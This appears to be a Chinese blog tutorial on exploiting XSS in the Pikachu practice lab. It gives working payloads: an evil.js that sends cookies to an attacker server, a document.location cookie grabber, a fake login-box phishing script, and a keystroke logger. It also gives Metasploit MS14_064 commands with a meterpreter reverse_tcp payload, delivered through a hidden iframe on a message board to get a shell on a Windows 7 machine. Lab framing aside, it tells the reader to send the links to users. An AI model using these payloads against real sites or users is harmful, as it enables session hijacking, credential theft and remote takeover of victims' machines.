赞
踩
程序对输入和输出控制不够严格,导致恶意构造的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行而产生危害
反射型XSS
储存性XSS
DOM型XSS
Cookie是用户对于特定网站的身份验证标志。XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。
首先,试试直接获取本地的cookie
先修改字符长度的限制
然后输入
<script>alert(document.cookie)</script>
就能获取cookie
利用这个原理可以尝试截取其他用户的cookie
方法一:
提前在攻击机上写好js代码evil.js
- var img=document.createElement("img");
- img.src="http://192.168.111.130/log?"+escape(document.cookie);
- document.body.appendChild(img);
这段代码在页面中插入了一张看不见的图片,同时把 document.cookie 对象作为参数发送到远程服务器,这样,就完成了一个简单的窃取 Cookie 的 XSS Payload
构造payload
http://192.168.111.130/pikachu-master/vul/xss/xss_reflected_get.php?message=<script src=http://192.168.111.130/evil.js></script>&submit=submit
将链接发给用户,用户点击链接
就可以获取用户的cookie
该方式是攻击者没有使用自己的服务器情况下。
方法二:
攻击者使用自己的服务器
Pikachu靶机中的pkxss文件复制到攻击机中的站点WWW下
将重定向的ip改为漏洞服务器的地址
在页面进行输入
<script>document.location='http://192.168.111.130/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
别忘记将字符长度的限制给修改掉
刷新一下页面,打开xss后台
将referer里的内容发给用户
用户访问这个链接,我们就能获得他的cookie值
首先登陆
post是不会显示在url里,所以需要使用burpsuite抓包更改
这时候我们不能直接把我们的恶意代码嵌入到url中
需要诱导受害者点击http://192.168.111.130/pkxss/xcookie/post.html
链接就能窃取用户的Cookie
利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入。
利用 JavaScript 在当前页面上“画出”一个伪造的登录框,当用户在登录框中输入用户名与密码后,其密码将被发送至攻击者的服务器上。
获取cookie一样,钓鱼的后台也有个接口(xfish.php)
更改fish文件的ip
构造一个payload嵌入到网页中,让用户每次访问这个页面时都会执行我们的payload
<script src="http://192.168.111.130/pikachu-master/pkxss/xfish/fish.php"></script>
访问fish.php文件
判断用户是否输入了账号和密码
如果没有输入会弹出
当输入账号和密码的时候他就会带着账号和密码访问另一个文件xfish.php
把传来的账号和密码上传到攻击者的数据库中。
刷新页面
利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站
首先制作木马服务器
使用MS14_064漏洞
该漏洞影响范围为Win95+IE3 – Win10+IE11全版本,形成被攻击主机缓冲区溢出,触发该漏洞须要客户端安装有power shell软件
kali作为攻击机
Kali自带的msf
root@kali:~# msfconsole # 启动msf
msf5 > msfdb init # 初始化数据库
msf5 > db_status # 查看MSF数据库链接状态
msf5 > search MS14_064 # 搜索MS14_064漏洞
msf 5> use exploit/windows/browser/ms14_064_ole_code_execution # 调用这个exploit
msf5 exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
# 设置调用的payload
msf5 exploit(ms14_064_ole_code_execution) > set lhost 192.168.111.178
# 设置监听IP(kali的IP)
msf5 exploit(ms14_064_ole_code_execution) > set lport 4444 # 设置监听端口
msf5 exploit(ms14_064_ole_code_execution) >exploit # 输入exploit(或者run)开启攻击服务
kali 的web服务已开启,并生成了一个URL
存在MS14_064漏洞的主机访问该URL就会被控制
使用window7作为靶机
访问上面的URL
kali马上提示已发送exploit至目标主机,而且打开了一个链接
使用session -l 命令可以查看当前有会话的主机的id
session -i +id号,kali就能够连上靶机(win7)
输入shell,成功取得靶机的shell
然后网页挂马
在留言板内输入payload:
<script src="kali生成的URL"></script>
或
<iframe src="kali生成的URL" height=0 weight=0 frameboder=0></iframe>
使用靶机浏览器访问这个挂马网页,kali就可以连接成功了
攻击者可以将这个网页发给用户
用户点击该链接
攻击者就能实现挂马
通过受害者访问已经被插入XSS代码的网站,触发js脚本,记录受害者在当前网站的键盘操作,传输到我们接收的网站
将
修改为
插入js标签
<script src="http://192.168.10.130/pikachu-master/pkxss/rkeypress/rk.js"></script>
后在文本框内输入内容
查看后台
注意:如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。